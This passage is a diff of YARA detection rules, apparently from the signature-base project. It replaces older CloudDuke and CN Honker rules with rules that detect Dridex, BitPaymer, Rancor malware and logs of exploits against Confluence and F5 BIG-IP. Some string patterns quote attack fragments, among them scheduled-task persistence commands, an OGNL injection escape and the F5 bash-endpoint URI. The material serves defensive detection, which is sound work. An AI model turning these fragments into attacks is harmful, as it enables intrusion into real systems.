-		hash3 = "d956e2ff1b22ccee2c5d9819128103d4c31ecefde3ce463a6dea19ecaaf418a1"
+
+	strings:
+		$a1 = "<svg xmlns=" ascii fullword
+		$sx1 = "src=\"data:application/ecmascript;base64,"
+		$sx2 = "=\"></script>"
+		$ss1 = "<script type=\"application/ecmascript\">"
+		$ss2 = "<svg xmlns=\"http://www.w3.org/2000/svg\" width=\"100%\" height=\"100%\">"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "7a861cd9c495e1d950a43cb708a22985" or pe.imphash ( ) == "566a7a4ef613a797389b570f8b4f79df" )
+		$a1 in ( 0 .. 1024 ) and ( filesize < 100KB and 1 of ( $sx* ) or filesize < 1MB and 2 of ( $s* ) )
 }
-rule SIGNATURE_BASE_Cloudduke_Malware : FILE
+rule SIGNATURE_BASE_Dridex_Trojan_XML
 {
 	meta:
-		description = "Detects CloudDuke Malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "902ef68b-7ed1-5622-b796-4e3bb2388124"
-		date = "2015-07-22"
+		description = "Dridex Malware in XML Document"
+		author = "Florian Roth (Nextron Systems) @4nc4p"
+		id = "a8f3406c-f8b0-559f-be12-6b2a7d401ac2"
+		date = "2015-03-08"
 		modified = "2023-12-05"
-		reference = "https://www.f-secure.com/weblog/archives/00002822.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cloudduke.yar#L10-L38"
+		reference = "https://threatpost.com/dridex-banking-trojan-spreading-via-macros-in-xml-files/111503"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_dridex_xml.yar#L1-L23"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "eaa159a99b6518db736adfd555bfcd052c2ae21b2e60a1db80b90459c47c90ab"
-		score = 60
+		logic_hash = "25b6340d782ee20723b2f17f3434a0b27b1561ab22d5a8f859e97e0ac126f651"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "97d8725e39d263ed21856477ed09738755134b5c0d0b9ae86ebb1cdd4cdc18b7"
-		hash2 = "88a40d5b679bccf9641009514b3d18b09e68b609ffaf414574a6eca6536e8b8f"
-		hash3 = "1d4ac97d43fab1d464017abb5d57a6b4601f99eaa93b01443427ef25ae5127f7"
-		hash4 = "ed7abf93963395ce9c9cba83a864acb4ed5b6e57fd9a6153f0248b8ccc4fdb46"
-		hash5 = "ee5eb9d57c3611e91a27bb1fc2d0aaa6bbfa6c69ab16e65e7123c7c49d46f145"
-		hash6 = "a713982d04d2048a575912a5fc37c93091619becd5b21e96f049890435940004"
-		hash7 = "56ac764b81eb216ebed5a5ad38e703805ba3e1ca7d63501ba60a1fb52c7ebb6e"
+		tags = ""
+		hash1 = "88d98e18ed996986d26ce4149ae9b2faee0bc082"
+		hash2 = "3b2d59adadf5ff10829bb5c27961b22611676395"
+		hash3 = "e528671b1b32b3fa2134a088bfab1ba46b468514"
+		hash4 = "981369cd53c022b434ee6d380aa9884459b63350"
+		hash5 = "96e1e7383457293a9b8f2c75270b58da0e630bea"
 
 	strings:
-		$s1 = "ProcDataWrap" fullword ascii
-		$s2 = "imagehlp.dll" fullword ascii
-		$s3 = "dnlibsh" fullword ascii
-		$s4 = "%ws_out%ws" fullword wide
-		$s5 = "Akernel32.dll" fullword wide
-		$op0 = { 0f b6 80 68 0e 41 00 0b c8 c1 e1 08 0f b6 c2 8b }
-		$op1 = { 8b ce e8 f8 01 00 00 85 c0 74 41 83 7d f8 00 0f }
-		$op2 = { e8 2f a2 ff ff 83 20 00 83 c8 ff 5f 5e 5d c3 55 }
+		$c_xml = "<?xml version="
+		$c_word = "<?mso-application progid=\"Word.Document\"?>"
+		$c_macro = "w:macrosPresent=\"yes\""
+		$c_binary = "<w:binData w:name="
+		$c_0_chars = "<o:Characters>0</o:Characters>"
+		$c_1_line = "<o:Lines>1</o:Lines>"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 720KB and 4 of ( $s* ) and 1 of ( $op* )
+		all of ( $c* )
 }
-rule SIGNATURE_BASE_SFXRAR_Acrotray : FILE
+rule SIGNATURE_BASE_LOG_EXPL_Confluence_RCE_CVE_2021_26084_Sep21 : LOG CVE_2021_26084
 {
 	meta:
-		description = "Most likely a malicious file acrotray in SFX RAR / CloudDuke APT 5442.1.exe, 5442.2.exe"
+		description = "Detects exploitation attempts against Confluence servers abusing a RCE reported as CVE-2021-26084"
 		author = "Florian Roth (Nextron Systems)"
-		id = "1566fb75-d3a8-5e22-b05b-3a2f37374f31"
-		date = "2015-07-22"
+		id = "bbf98ce4-d32b-541a-b727-bc35c9aaef53"
+		date = "2021-09-01"
 		modified = "2023-12-05"
-		reference = "https://www.f-secure.com/weblog/archives/00002822.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_cloudduke.yar#L42-L61"
+		reference = "https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/expl_cve_2021_26084_confluence_log.yar#L2-L24"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "3b318ab2854eb7614dd1a42d3971a96d1d485d5cce552336ad3a7f39886ba710"
-		score = 70
-		quality = 85
-		tags = "FILE"
-		super_rule = 1
-		hash1 = "51e713c7247f978f5836133dd0b8f9fb229e6594763adda59951556e1df5ee57"
-		hash2 = "5d695ff02202808805da942e484caa7c1dc68e6d9c3d77dc383cfa0617e61e48"
-		hash3 = "56531cc133e7a760b238aadc5b7a622cd11c835a3e6b78079d825d417fb02198"
+		logic_hash = "04542570b4814efde3d96ba5be8b5f9fd6e3c51be09f0e8a1c4eba45bfd8f5ff"
+		score = 55
+		quality = 35
+		tags = "LOG, CVE-2021-26084"
 
 	strings:
-		$s1 = "winrarsfxmappingfile.tmp" fullword wide
-		$s2 = "GETPASSWORD1" fullword wide
-		$s3 = "acrotray.exe" fullword ascii
-		$s4 = "CryptUnprotectMemory failed" fullword wide
+		$xr1 = /isSafeExpression Unsafe clause found in \['[^\n]{1,64}\\u0027/ ascii wide
+		$xs1 = "[util.velocity.debug.DebugReferenceInsertionEventHandler] referenceInsert resolving reference [$!queryString]"
+		$xs2 = "userName: anonymous | action: createpage-entervariables ognl.ExpressionSyntaxException: Malformed OGNL expression: '\\' [ognl.TokenMgrError: Lexical error at line 1"
+		$sa1 = "GET /pages/doenterpagevariables.action"
+		$sb1 = "%5c%75%30%30%32%37"
+		$sb2 = "\\u0027"
+		$sc1 = " ERROR "
+		$sc2 = " | userName: anonymous | action: createpage-entervariables"
+		$re1 = /\[confluence\.plugins\.synchrony\.SynchronyContextProvider\] getContextMap (\n )?-- url: \/pages\/createpage-entervariables\.action/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2449KB and all of them
+		1 of ( $x* ) or ( $sa1 and 1 of ( $sb* ) ) or ( all of ( $sc* ) and $re1 )
 }
-rule SIGNATURE_BASE_CN_Honker_MAC_IPMAC : FILE
+rule SIGNATURE_BASE_Bitpaymer_1
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file IPMAC.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5424d3a7-765a-5dfb-9177-d5633f83079f"
-		date = "2015-06-23"
+		description = "Rule to detect newer Bitpaymer samples. Rule is based on BitPaymer custom packer"
+		author = "Morphisec labs"
+		id = "916de232-1f1b-5853-a57f-623812cfed16"
+		date = "2023-12-05"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L10-L26"
+		reference = "http://blog.morphisec.com/bitpaymer-ransomware-with-new-custom-packer-framework"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_crime_bitpaymer.yar#L1-L12"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "24d55b6bec5c9fff4cd6f345bacac7abadce1611"
-		logic_hash = "395dfb840346bbf3f68fa198e76349cf65c703b28fd168b85d846d07df1845fe"
-		score = 70
+		logic_hash = "0c236794c04f0805d4611cfaf43369eeb4d0e65d6c697e6c5e6afd321fbca629"
+		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s1 = "Http://Www.YrYz.Net" fullword wide
-		$s2 = "IpMac.txt" fullword ascii
-		$s3 = "192.168.0.1" fullword ascii
+		$opcodes1 = {B9 ?? 00 00 00 FF 14 0F B8 FF 00 00 00 C3 89 45 FC}
+		$opcodes2 = {61 55 FF 54 B7 01 B0 FF C9 C3 CC 89 45 FC}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 267KB and all of them
+		( uint16( 0 ) == 0x5a4d ) and ( $opcodes1 or $opcodes2 )
 }
-rule SIGNATURE_BASE_CN_Honker_Getsyskey : FILE
+rule SIGNATURE_BASE_Brooxml_Hunting : HUNTING FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file GetSyskey.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "08f5b5b1-3085-5bf1-9789-023be5a039f8"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L28-L43"
+		description = "Detects Microsoft OOXML files with prepended data/manipulated header"
+		author = "Proofpoint"
+		id = "1ffea1c7-9f97-5bb1-93d7-ce914765416f"
+		date = "2024-11-27"
+		modified = "2024-12-12"
+		reference = "https://x.com/threatinsight/status/1861817946508763480"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_brooxml_dec24.yar#L2-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "17cec5e75cda434d0a1bc8cdd5aa268b42633fe9"
-		logic_hash = "1f12ea9d62d4aaf695328fb335445f3dae3996595402586d2ee52098e6727d10"
+		logic_hash = "89da6056adbae6155e682b84b950db84e3aedbb9ae693118e6e09d9ed67b03dd"
 		score = 70
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		quality = 58
+		tags = "HUNTING, FILE"
+		category = "hunting"
 
 	strings:
-		$s2 = "GetSyskey <SYSTEM registry file> [Output system key file]" fullword ascii
-		$s4 = "The system key file \"%s\" is created." fullword ascii
+		$pk_ooxml_magic = {50 4b 03 04 [22] 13 00 [2] 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c}
+		$pk_0102 = {50 4b 01 02}
+		$pk_0304 = {50 4b 03 04}
+		$pk_0506 = {50 4b 05 06}
+		$pk_0708 = {50 4b 07 08}
+		$word = "word/"
+		$ole = {d0 cf 11 e0}
+		$mz = {4d 5a}
+		$tef = {78 9f 3e 22}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them
+		$pk_ooxml_magic in ( 4 .. 16384 ) and $pk_0506 in ( 16384 .. filesize ) and #pk_0506 == 1 and #pk_0102 > 2 and #pk_0304 > 2 and $word and not ( $pk_0102 at 0 ) and not ( $pk_0304 at 0 ) and not ( $pk_0506 at 0 ) and not ( $pk_0708 at 0 ) and not ( $ole at 0 ) and not ( $mz at 0 ) and not ( $tef at 0 )
 }
-rule SIGNATURE_BASE_CN_Honker_Churrasco : FILE
+rule SIGNATURE_BASE_Brooxml_Phishing : PHISHING
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Churrasco.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "58873cd6-0c9e-58a0-923a-aca8a1d42017"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L45-L64"
+		description = "Detects PDF and OOXML files leading to AiTM phishing"
+		author = "Proofpoint"
+		id = "ccd8ab30-90a4-5d4b-8a77-dbc4669bdb95"
+		date = "2024-11-27"
+		modified = "2024-12-12"
+		reference = "https://x.com/threatinsight/status/1861817946508763480"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_brooxml_dec24.yar#L41-L56"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5a3c935d82a5ff0546eff51bb2ef21c88198f5b8"
-		logic_hash = "f60589bda76367578388cbe6af912c80c9364a7047ed52ca2b4156a1b277e7ca"
-		score = 70
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		logic_hash = "5cc7bc1383e1ded8e8613cbb4fad003e35b67059ca70d33f29406a5c146a5464"
+		score = 65
+		quality = 31
+		tags = "PHISHING"
+		category = "phishing"
 
 	strings:
-		$s0 = "HEAD9 /" ascii
-		$s1 = "logic_er" fullword ascii
-		$s6 = "proggam" fullword ascii
-		$s16 = "DtcGetTransactionManagerExA" fullword ascii
-		$s17 = "GetUserNameA" fullword ascii
-		$s18 = "OLEAUT" fullword ascii
+		$hex1 = { 21 20 03 20 c3 be c3 bf 09 20 [0-1] 06 20 20 20 20 20 20 20 20 20 20 20 01 20 20 20 06 20 20 20 20 20 20 20 20 10 20 20 05 20 20 20 01 20 20 20 c3 be c3 bf c3 bf c3 bf }
+		$docx = { 50 4b }
+		$pdf = { 25 50 44 46 2d }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1276KB and all of them
+		all of ( $hex* ) and ( ( $docx at 0 ) or ( $pdf at 0 ) )
 }
-rule SIGNATURE_BASE_CN_Honker_Mysql_Injectv1_1_Creak : FILE
+rule SIGNATURE_BASE_MAL_BACKORDER_LOADER_WIN_Go_Jan23 : LOADER GOLANG BACKORDER MALWARE WINDOWS FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file mysql_injectV1.1_Creak.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "39025a57-557a-53c0-bfdb-81fe83f824af"
-		date = "2015-06-23"
-		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L66-L81"
+		description = "Detects the BACKORDER loader compiled in GO which download and executes a second stage payload from a remote server."
+		author = "Arda Buyukkaya (modified by Florian Roth)"
+		id = "90a82f2c-be92-5d0b-b47e-f47db2b15867"
+		date = "2025-01-23"
+		modified = "2025-03-20"
+		reference = "EclecticIQ"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_win_go_backorder_loader.yar#L1-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a1f066789f48a76023598c5777752c15f91b76b0"
-		logic_hash = "f61557216a7e90ff9655ad8aea4a9adf0e4435c7a3f7958423e46fd2265bad07"
-		score = 70
+		hash = "70c91ffdc866920a634b31bf4a070fb3c3f947fc9de22b783d6f47a097fec2d8"
+		logic_hash = "9e79ec9e58e02b7660383ff20957b95bc3c61ed3badc9af3d5829ebe5bf6bd7b"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "LOADER, GOLANG, BACKORDER, MALWARE, WINDOWS, FILE"
 
 	strings:
-		$s0 = "1http://192.169.200.200:2217/mysql_inject.php?id=1" fullword ascii
-		$s12 = "OnGetPassword" fullword ascii
+		$GoBuildId = "Go build" ascii
+		$x_DebugSymbol_1 = "C:/updatescheck/main.go"
+		$x_DebugSymbol_2 = "C:/Users/IEUser/Desktop/Majestic/"
+		$s_FunctionName_1 = "main.getUpdates.func"
+		$s_FunctionName_2 = "main.obt_zip"
+		$s_FunctionName_3 = "main.obtener_zip"
+		$s_FunctionName_4 = "main.get_zip"
+		$s_FunctionName_5 = "main.show_pr0gressbar"
+		$s_FunctionName_6 = "main.pr0cess"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5890KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 10MB and $GoBuildId and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_CN_Honker_ASP_Wshell : FILE
+rule SIGNATURE_BASE_APT_RANCOR_JS_Malware : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file wshell.txt"
+		description = "Rancor Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "028136cd-129b-5d58-a4c2-ba730a798c06"
-		date = "2015-06-23"
+		id = "83dd9567-199e-511c-8c9a-96422bd793e7"
+		date = "2018-06-26"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L83-L100"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rancor.yar#L13-L28"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "3ae33c835e7ea6d9df74fe99fcf1e2fb9490c978"
-		logic_hash = "f6f83acb76248a1b00f1acac621e68888c93b34d4813d8f8613d5d9095c53a8a"
-		score = 70
+		logic_hash = "0d1e86d4395d4f84518750b5d58d15ed79b79570fbe50010d5d790b4c2511bb2"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "1dc5966572e94afc2fbcf8e93e3382eef4e4d7b5bc02f24069c403a28fa6a458"
 
 	strings:
-		$s0 = "<%@ LANGUAGE = VBScript.Encode %><%" fullword ascii
-		$s1 = "UserPass="
-		$s2 = "VerName="
-		$s3 = "StateName="
+		$x1 = ",0,0 >%SystemRoot%\\system32\\spool\\drivers\\color\\fb.vbs\",0,0" fullword ascii
+		$x2 = "CreateObject(\"Wscript.Shell\").Run \"explorer.exe \"\"http" ascii
+		$x3 = "CreateObject(\"Wscript.Shell\").Run \"schtasks /create" ascii
 
 	condition:
-		uint16( 0 ) == 0x253c and filesize < 200KB and all of them
+		uint16( 0 ) == 0x533c and filesize < 1KB and 1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Exp_Iis7 : FILE
+rule SIGNATURE_BASE_APT_RANCOR_PLAINTEE_Variant : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file iis7.exe"
+		description = "Detects PLAINTEE malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "edfafc9a-032a-5ccb-9a1f-faeab0dfa31d"
-		date = "2015-06-23"
+		id = "f5b68079-0517-504d-a45f-f6ced532db82"
+		date = "2018-06-26"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L102-L119"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rancor.yar#L30-L49"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0a173c5ece2fd4ac8ecf9510e48e95f43ab68978"
-		logic_hash = "91ceec96297e5cc027e261fd708899787b9be4ac15e209e0734a3b8563ae31b5"
-		score = 70
+		logic_hash = "d22aa91d0f66dbb85b79c0f121f0508135bf817929d81f3ff0b3fdf223ba53ec"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "6aad1408a72e7adc88c2e60631a6eee3d77f18a70e4eee868623588612efdd31"
+		hash2 = "bcd37f1d625772c162350e5383903fe8dbed341ebf0dc38035be5078624c039e"
 
 	strings:
-		$s0 = "\\\\localhost" fullword ascii
-		$s1 = "iis.run" fullword ascii
-		$s3 = ">Could not connecto %s" fullword ascii
-		$s4 = "WinSta0\\Default" fullword ascii
+		$s1 = "payload.dat" fullword ascii
+		$s3 = "temp_microsoft_test.txt" fullword ascii
+		$s4 = "reg add %s /v %s /t REG_SZ /d \"%s\"" fullword ascii
+		$s6 = "%s %s,helloworld2" fullword ascii
+		$s9 = "%s \\\"%s\\\",helloworld" fullword ascii
+		$s16 = "recv plugin type %s size:%d" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 60KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and 3 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Segmentweapon : FILE
+
+rule SIGNATURE_BASE_APT_RANCOR_PLAINTEE_Malware_Exports : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file SegmentWeapon.exe"
+		description = "Detects PLAINTEE malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e1b6f721-4c4d-50f2-9ed6-f38e8e7ea4ab"
-		date = "2015-06-23"
+		id = "fa1e678d-8357-522b-9167-31321ab7753f"
+		date = "2018-06-26"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L121-L136"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rancor.yar#L51-L62"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "494ef20067a7ce2cc95260e4abc16fcfa7177fdf"
-		logic_hash = "9afb70a3ae158b7abbda6725b8c9901121b78fa0e874db12b4ac08bf59b26fb5"
-		score = 70
+		logic_hash = "aa55452d4639dbaec760277908906c4ff9e8b66a60b1bcdc157ce23bd5d596db"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "C:\\WINDOWS\\system32\\msvbvm60.dll\\3" fullword ascii
-		$s1 = "http://www.nforange.com/inc/1.asp?" fullword wide
+		hash1 = "c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them
+		uint16( 0 ) == 0x5a4d and pe.exports ( "Add" ) and pe.exports ( "Sub" ) and pe.exports ( "DllEntryPoint" ) and pe.number_of_exports == 3
 }
-rule SIGNATURE_BASE_CN_Honker_Alien_Iispwd : FILE
+
+rule SIGNATURE_BASE_APT_RANCOR_DDKONG_Malware_Exports : FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file iispwd.vbs"
+		description = "Detects DDKONG malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e561c548-c656-5528-a2a8-2798a59ac6bf"
-		date = "2015-06-23"
+		id = "c94d4ea2-7c16-5003-98ea-253f8a2d01d1"
+		date = "2018-06-26"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L138-L153"
+		reference = "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_rancor.yar#L64-L75"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5d157a1b9644adbe0b28c37d4022d88a9f58cedb"
-		logic_hash = "16dc6ec4b668fdc43e3a9a8ea31ad0caa1a80b1015ab60eec0eb76bfacd69c5f"
-		score = 70
+		logic_hash = "2d11d46530c22b323c504344448d91fd43c0eecd29cf29aa4da7b2c797d27ff9"
+		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s0 = "set IIs=objservice.GetObject(\"IIsWebServer\",childObjectName)" fullword ascii
-		$s1 = "wscript.echo \"from : http://www.xxx.com/\" &vbTab&vbCrLf" fullword ascii
+		hash1 = "c35609822e6239934606a99cb3dbc925f4768f0b0654d6a2adc35eca473c505d"
 
 	condition:
-		filesize < 3KB and all of them
+		uint16( 0 ) == 0x5a4d and pe.exports ( "ServiceMain" ) and pe.exports ( "Rundll32Call" ) and pe.exports ( "DllEntryPoint" ) and pe.number_of_exports == 3
 }
-rule SIGNATURE_BASE_CN_Honker_Md5Cracktools : FILE
+rule SIGNATURE_BASE_LOG_F5_BIGIP_Exploitation_Artefacts_CVE_2021_22986_Mar21_1 : LOG
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file Md5CrackTools.exe"
+		description = "Detects forensic artefacts indicating successful exploitation of F5 BIG IP appliances as reported by NCCGroup"
 		author = "Florian Roth (Nextron Systems)"
-		id = "16e04a66-0f6f-5b94-97c3-df62aa9406a9"
-		date = "2015-06-23"
+		id = "e109ebeb-e5c3-5999-95dc-0963ed8461a6"
+		date = "2021-03-20"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L155-L170"
+		reference = "https://research.nccgroup.com/2021/03/18/rift-detection-capabilities-for-recent-f5-big-ip-big-iq-icontrol-rest-api-vulnerabilities-cve-2021-22986/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/exploit_f5_bigip_cve_2021_22986_log.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9dfd9c9923ae6f6fe4cbfa9eb69688269285939c"
-		logic_hash = "a176393c0324bcc634a31c261aa6b528fb5a5893c40a5534b34253a1922c8285"
-		score = 70
+		logic_hash = "748bb429d4a086e2890773558ea502ef06f507aed5f0f70470e2cd97a3fd5007"
+		score = 80
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = "LOG"
 
 	strings:
-		$s1 = "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" fullword ascii
-		$s2 = ",<a href='index.php?c=1&type=md5&hash=" fullword ascii
+		$x1 = "\",\"method\":\"POST\",\"uri\":\"http://localhost:8100/mgmt/tm/util/bash\",\"status\":200," ascii
+		$x2 = "[com.f5.rest.app.RestServerServlet] X-F5-Auth-Token doesn't have value, so skipping" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 4580KB and all of them
+		1 of them
 }
-rule SIGNATURE_BASE_CN_Honker_Coolscan_Scan : FILE
+rule SIGNATURE_BASE_Xdedic_Sysscan_Unpacked : CRIMEWARE FILE
 {
 	meta:
-		description = "Sample from CN Honker Pentest Toolset - file scan.exe"
-		author = "Florian Roth (Nextron Systems)"
-		id = "781446d2-3363-56c3-9767-c7ac70047b68"
-		date = "2015-06-23"
+		description = "Detects SysScan APT tool"
+		author = " Kaspersky Lab"
+		id = "4f5d37b3-e3aa-51ec-b36e-b494c8abe227"
+		date = "2016-03-14"
 		modified = "2023-12-05"
-		reference = "Disclosed CN Honker Pentest Toolset"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/cn_pentestset_tools.yar#L172-L187"
+		reference = "https://securelist.com/blog/research/75027/xdedic-the-shady-world-of-hacked-servers-for-sale/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_sysscan.yar#L1-L27"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e1c5fb6b9f4e92c4264c7bea7f5fba9a5335c328"
-		logic_hash = "89c7d24d821e907f79ab5630eed13275c5216cff6bf203b5c8f66bb1a178039b"
-		score = 70
